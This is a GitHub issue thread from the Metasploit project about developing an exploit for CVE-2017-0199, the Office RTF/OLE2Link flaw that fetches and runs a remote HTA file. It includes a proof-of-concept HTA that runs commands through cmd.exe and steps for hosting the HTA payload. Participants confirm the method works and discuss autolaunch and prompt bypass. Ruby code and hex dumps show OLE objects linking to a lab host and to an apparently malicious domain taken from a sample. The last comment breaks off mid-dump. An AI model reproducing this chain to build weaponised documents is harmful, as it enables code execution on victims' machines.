search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.1k stars 13.76k forks source link

CVE-2017-0199 - exploit office with ole link object #8220

Closed nixawk closed 7 years ago

nixawk commented 7 years ago

The existence of the flaw was revealed by McAfee researchers on Friday, and confirmed by FireEye researchers on Saturday. The latter shared details about it with Microsoft weeks ago, and were waiting to publicly reveal the flaw once Microsoft pushed out a patch. The patch is still to be released.

“The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office,” McAfee researchers noted.

The flaw is exploited through a specially crafted Microsoft Word RTF (Rich Text Format) file, which contains an embedded OLE2link object. The object instructs Word to send a HTTP request to a remote server controlled by the attackers, to retrieve from it a malicious .hta file masquerading as a RTF file.

A .hta file is an executable, and in this case it loads and executes a malicious script that closes Word (i.e. the winword.exe process), downloads additional payloads, and starts Word again and shows a decoy document.

“Because .hta is executable, the attacker gains full code execution on the victim’s machine. Thus, this is a logical bug, and gives the attackers the power to bypass any memory-based mitigations developed by Microsoft,” the researchers explained.

References

  1. https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
  2. https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
  3. https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
  4. https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
  5. https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
  6. https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
  7. https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
  8. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
  9. https://www.microsoft.com/en-us/download/details.aspx?id=7105
  10. https://www.microsoft.com/en-us/download/details.aspx?id=10725
nixawk commented 7 years ago

If regedit shows as 

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{00000300-0000-0000-C000-000000000046}\InprocServer32]
@="ole32.dll"

poc.rtf

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>

windows fails to execute payload. StdOleLink is the key.

How to exploit the vulnerability ?

  1. Setup a hta server.
  2. Insert a package with hta url.
screen shot 2017-04-12 at 10 54 25

CVE-2017-0199 Copy

https://github.com/nixawk/labs/tree/master/CVE-2017-0199

vysecurity commented 7 years ago

Have you got it working?

I host RTF and autolink then switch to HTA with application content type. Works fine this way.

Autolaunch too

nixawk commented 7 years ago

@vysec Could you show more details about your lab and office ver ? I've tested it on windows 7 Ultimate (not sp1) with office 2010, but failed.

If windows 7 sp1, everything goes well.

https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html

Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Microsoft Office 2007 Service Pack 3 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 Service Pack 1 (32-bit editions) Microsoft Office 2013 Service Pack 1 (64-bit editions) Microsoft Office 2016 (32-bit edition) Microsoft Office 2016 (64-bit edition) Windows Vista Service Pack 2 Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

vysecurity commented 7 years ago

OK works fine now :)

Some "technical reports" are there are reporting false samples... Not every random OLE2Link is the 1 day. There's a 0day technique out there to bypass some prompts / measures but the 1day in question isn't what's displayed in some of the reports as the payloads not even correct...

nixawk commented 7 years ago

Is there a way to create a vulnerable docx with metasploit ?

busterb commented 7 years ago

modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.

vysecurity commented 7 years ago

I'll have a look after work

On Thu, 13 Apr 2017 at 03:13, Brent Cook notifications@github.com wrote:

modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-293757634, or mute the thread https://github.com/notifications/unsubscribe-auth/ADbf0puJjSqNi4DibbCg3ji5jfLDM1urks5rvYTJgaJpZM4M5lMa .

nixawk commented 7 years ago
screen shot 2017-04-13 at 09 40 27 screen shot 2017-04-13 at 09 40 54 screen shot 2017-04-13 at 09 42 10
nixawk commented 7 years ago

I've created a rb to parse ole object bin as follow. Could anyone show me how to parse data = ministream.instance_variable_get(:@data) ? Is there a format link for data ? How to create a new data to replace it ?

https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf

*** ministream (384 bytes):
{
  sid => 0x0,
  _ab => "Root Entry",          # Directory Entry Name
  _cb => 0x0016,                # Directory Entry Name Length 
  _mse => 0x02,                 # Object Type
  _bflags => 0x00,              # Color Flag 
  _sidLeftSib => 0xffffffff,    # Left Sibling ID 
  _sidRightSib => 0xffffffff,   # Right Sibling ID
  _sidChild => 0xffffffff,      # Child ID 
  _clsId => 00000000-0000-0000-0000-000000000000,  # CLSID
  _dwUserFlags => 0x00000000,                      # State Flags
  _ctime => 00 00 00 00 00 00 00 00    |........|  # Creation Time
  _mtime => 00 00 00 00 00 00 00 00    |........|  # Modification Time
  _sectStart => 0xfffffffe,                        # Starting Sector Location 
  _ulSize => 0x0000000000000180,                   # Stream Size 
  data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 6e 00 00 00 e0 c9 ea 79    |........n......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 56 00 00 00    |.........K..V...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00    |h.t.t.p.:././.1.|
39 00 32 00 2e 00 31 00 36 00 38 00 2e 00 32 00    |9.2...1.6.8...2.|
30 00 36 00 2e 00 31 00 34 00 34 00 2f 00 70 00    |0.6...1.4.4./.p.|
6f 00 63 00 2e 00 72 00 74 00 66 00 00 00 79 58    |o.c...r.t.f...yX|
81 f4 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00    |..;..H.,.]..'c..|
00 00 a5 ab 00 00 ff ff ff ff 06 09 02 00 00 00    |................|
00 00 c0 00 00 00 00 00 00 46 00 00 00 00 ff ff    |.........F......|
ff ff 00 00 00 00 00 00 00 00 e0 81 81 54 cb b4    |.............T..|
d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
10 00 03 00 0d 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
1e 00 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38    |..http://192.168|
2e 32 30 36 2e 31 34 34 2f 70 6f 63 2e 72 74 66    |.206.144/poc.rtf|
00 00 bb bb cc cc 1e 00 68 00 74 00 74 00 70 00    |........h.t.t.p.|
3a 00 2f 00 2f 00 31 00 39 00 32 00 2e 00 31 00    |:././.1.9.2...1.|
36 00 38 00 2e 00 32 00 30 00 36 00 2e 00 31 00    |6.8...2.0.6...1.|
34 00 34 00 2f 00 70 00 6f 00 63 00 2e 00 72 00    |4.4./.p.o.c...r.|
74 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00    |t.f.............|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
}

Parse OLE Object Bin

require 'ole/storage'
require 'rex/ole'

filename = 'test.doc_object_000001BC.bin'

# ole/storage
ole = Ole::Storage.open(filename, 'rb+')
puts ole.dirents.length

puts ole.root.to_tree

# rex/ole
ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
ministream = ole.instance_variable_get(:@ministream)
data = ministream.instance_variable_get(:@data)

olebin = ::File.open('ole-ministream.bin', 'wb+')
olebin.write(data)
olebin.close
CVE-2017-0199 ->> ruby read_ole.rb

From: /Users/nixawk/Desktop/CVE-2017-0199/read_ole.rb @ line 19 :

    14: require 'rex/ole'
    15: ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
    16: ministream = ole.instance_variable_get(:@ministream)
    17: # puts ministream.instance_variable_get(:@data)
    18:
 => 19: binding.pry

[1] pry(main)> ministream
=> #<Rex::OLE::Stream:0x007fc37584de48
 @_ab="Root Entry",
 @_bflags=0,
 @_cb=nil,
 @_clsId=#<Rex::OLE::CLSID:0x007fc37584ddd0 @buf="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00">,
 @_ctime="\x00\x00\x00\x00\x00\x00\x00\x00",
 @_dwUserFlags=0,
 @_mse=2,
 @_mtime="\x00\x00\x00\x00\x00\x00\x00\x00",
 @_sectStart=4294967294,
 @_sidChild=4294967295,
 @_sidLeftSib=4294967295,
 @_sidRightSib=4294967295,
 @_ulSize=512,
 @children=[],
 @data=
  "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\vD\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00h\x00y\x00o\x00e\x00y\x00e\x00e\x00p\x00.\x00w\x00s\x00/\x00t\x00e\x00m\x00p\x00l\x00a\x00t\x00e\x00.\x00d\x00o\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00yX\x81\xF4;\x1D\x7FH\xAF,\x82]\xC4\x85'c\x00\x00\x00\x00\xA5\xAB\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
 @offset=0,
 @sid=0,
 @stg=
  header = {
  _abSig => "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
  _clid => 00000000-0000-0000-0000-000000000000,
  _uMinorVersion => 0x003e,
  _uMajorVersion => 0x0003,
  _uByteOrder => 0xfffe,
  _uSectorShift => 0x0009,
  _uMiniSectorShift => 0x0006,
  _csectDir => 0x00000000,
  _csectFat => 0x00000001,
  _sectDirStart => 0x00000001,
  _signature => 0x00000000,
  _uMiniSectorCutoff => 0x00001000,
  _sectMiniFatStart => 0x00000002,
  _csectMiniFat => 0x00000001,
  _sectDifStart => 0xfffffffe,
  _csectDif => 0x00000000
}
*** 109 DIFAT sectors
{ 0x0, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 FAT sectors
{ FAT, END, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 MiniFAT sectors:
{ 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** ministream (512 bytes):
{
  sid => 0x0,
  _ab => "Root Entry",
  _cb => 0x0016,
  _mse => 0x02,
  _bflags => 0x00,
  _sidLeftSib => 0xffffffff,
  _sidRightSib => 0xffffffff,
  _sidChild => 0xffffffff,
  _clsId => 00000000-0000-0000-0000-000000000000,
  _dwUserFlags => 0x00000000,
  _ctime => 00 00 00 00 00 00 00 00    |........|
  _mtime => 00 00 00 00 00 00 00 00    |........|
  _sectStart => 0xfffffffe,
  _ulSize => 0x0000000000000200,
  data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 5c 01 00 00 e0 c9 ea 79    |........\......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00    |.........K..D...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00    |h.t.t.p.:././.h.|
79 00 6f 00 65 00 79 00 65 00 65 00 70 00 2e 00    |y.o.e.y.e.e.p...|
77 00 73 00 2f 00 74 00 65 00 6d 00 70 00 6c 00    |w.s./.t.e.m.p.l.|
61 00 74 00 65 00 2e 00 64 00 6f 00 63 00 00 00    |a.t.e...d.o.c...|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 79 58 81 f4    |............yX..|
3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 00 00    |;..H.,.]..'c....|
a5 ab 00 00 ff ff ff ff 20 69 33 25 f9 03 cf 11    |........ i3%....|
8f d0 00 aa 00 68 6f 13 00 00 00 00 ff ff ff ff    |.....ho.........|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
10 00 03 00 04 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    |................|
}
*** 3 directory entries
{
  sid => 0x0,
  _ab => "Root Entry",
  _cb => 0x0016,
  _mse => 0x05,
  _bflags => 0x00,
  _sidLeftSib => 0xffffffff,
  _sidRightSib => 0xffffffff,
  _sidChild => 0x00000001,
  _clsId => 00000300-0000-0000-c000-000000000046,
  _dwUserFlags => 0x00000000,
  _ctime => 00 00 00 00 00 00 00 00    |........|
  _mtime => 10 4e ab 9b 42 49 d2 01    |.N..BI..|
  _sectStart => 0x00000003,
  _ulSize => 0x0000000000000200,
  *children* =>
  {
    sid => 0x1,
    _ab => "\x01Ole",
    _cb => 0x000a,
    _mse => 0x02,
    _bflags => 0x01,
    _sidLeftSib => 0xffffffff,
    _sidRightSib => 0x00000002,
    _sidChild => 0xffffffff,
    _clsId => 00000000-0000-0000-0000-000000000000,
    _dwUserFlags => 0x00000000,
    _ctime => 00 00 00 00 00 00 00 00    |........|
    _mtime => 00 00 00 00 00 00 00 00    |........|
    _sectStart => 0x00000000,
    _ulSize => 0x00000000000001a8,
    data =>
--NOT OPENED YET--
  }
  {
    sid => 0x2,
    _ab => "\x03ObjInfo",
    _cb => 0x0012,
    _mse => 0x02,
    _bflags => 0x00,
    _sidLeftSib => 0xffffffff,
    _sidRightSib => 0xffffffff,
    _sidChild => 0xffffffff,
    _clsId => 00000000-0000-0000-0000-000000000000,
    _dwUserFlags => 0x00000000,
    _ctime => 00 00 00 00 00 00 00 00    |........|
    _mtime => 00 00 00 00 00 00 00 00    |........|
    _sectStart => 0x00000007,
    _ulSize => 0x0000000000000006,
    data =>
--NOT OPENED YET--
  }

}
>
vysecurity commented 7 years ago

So I applied the patch... but the machine is still vulnerable... ???

On Fri, Apr 14, 2017 at 9:58 AM, Vex Woo notifications@github.com wrote:

Prase ole object

require 'rex/ole' require 'pry'

filename = 'ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin'

ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ) ministream = ole.instance_variable_get(:@ministream)

puts ministream.instance_variable_get(:@data)

binding.pry

CVE-2017-0199 ->> ruby read_ole.rb

From: /Users/nixawk/Desktop/CVE-2017-0199/read_ole.rb @ line 19 :

14: require 'rex/ole'
15: ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
16: ministream = ole.instance_variable_get(:@ministream)
17: # puts ministream.instance_variable_get(:@data)
18:

=> 19: binding.pry

[1] pry(main)> ministream => #<Rex::OLE::Stream:0x007fc37584de48 @_ab="Root Entry", @_bflags=0, @_cb=nil, @_clsId=#<Rex::OLE::CLSID:0x007fc37584ddd0 @buf="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00">, @_ctime="\x00\x00\x00\x00\x00\x00\x00\x00", @_dwUserFlags=0, @_mse=2, @_mtime="\x00\x00\x00\x00\x00\x00\x00\x00", @_sectStart=4294967294, @_sidChild=4294967295, @_sidLeftSib=4294967295, @_sidRightSib=4294967295, @_ulSize=512, @children=[], @data= "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\x01\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\vD\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00h\x00y\x00o\x00e\x00y\x00e\x00e\x00p\x00.\x00w\x00s\x00/\x00t\x00e\x00m\x00p\x00l\x00a\x00t\x00e\x00.\x00d\x00o\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00yX\x81\xF4;\x1D\x7FH\xAF,\x82]\xC4\x85'c\x00\x00\x00\x00\xA5\xAB\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", @offset=0, @sid=0, @stg= header = { _abSig => "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", _clid => 00000000-0000-0000-0000-000000000000, _uMinorVersion => 0x003e, _uMajorVersion => 0x0003, _uByteOrder => 0xfffe, _uSectorShift => 0x0009, _uMiniSectorShift => 0x0006, _csectDir => 0x00000000, _csectFat => 0x00000001, _sectDirStart => 0x00000001, _signature => 0x00000000, _uMiniSectorCutoff => 0x00001000, _sectMiniFatStart => 0x00000002, _csectMiniFat => 0x00000001, _sectDifStart => 0xfffffffe, _csectDif => 0x00000000 } 109 DIFAT sectors { 0x0, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE } 128 FAT sectors { FAT, END, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE } 128 MiniFAT sectors: { 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE } ministream (512 bytes): { sid => 0x0, _ab => "Root Entry", _cb => 0x0016, _mse => 0x02, _bflags => 0x00, _sidLeftSib => 0xffffffff, _sidRightSib => 0xffffffff, _sidChild => 0xffffffff, _clsId => 00000000-0000-0000-0000-000000000000, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 00 00 00 00 00 00 00 00 |........| _sectStart => 0xfffffffe, _ulSize => 0x0000000000000200, data => 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 5c 01 00 00 e0 c9 ea 79 |..............y| f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00 |.........K..D...| 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 |h.t.t.p.:././.h.| 79 00 6f 00 65 00 79 00 65 00 65 00 70 00 2e 00 |y.o.e.y.e.e.p...| 77 00 73 00 2f 00 74 00 65 00 6d 00 70 00 6c 00 |w.s./.t.e.m.p.l.| 61 00 74 00 65 00 2e 00 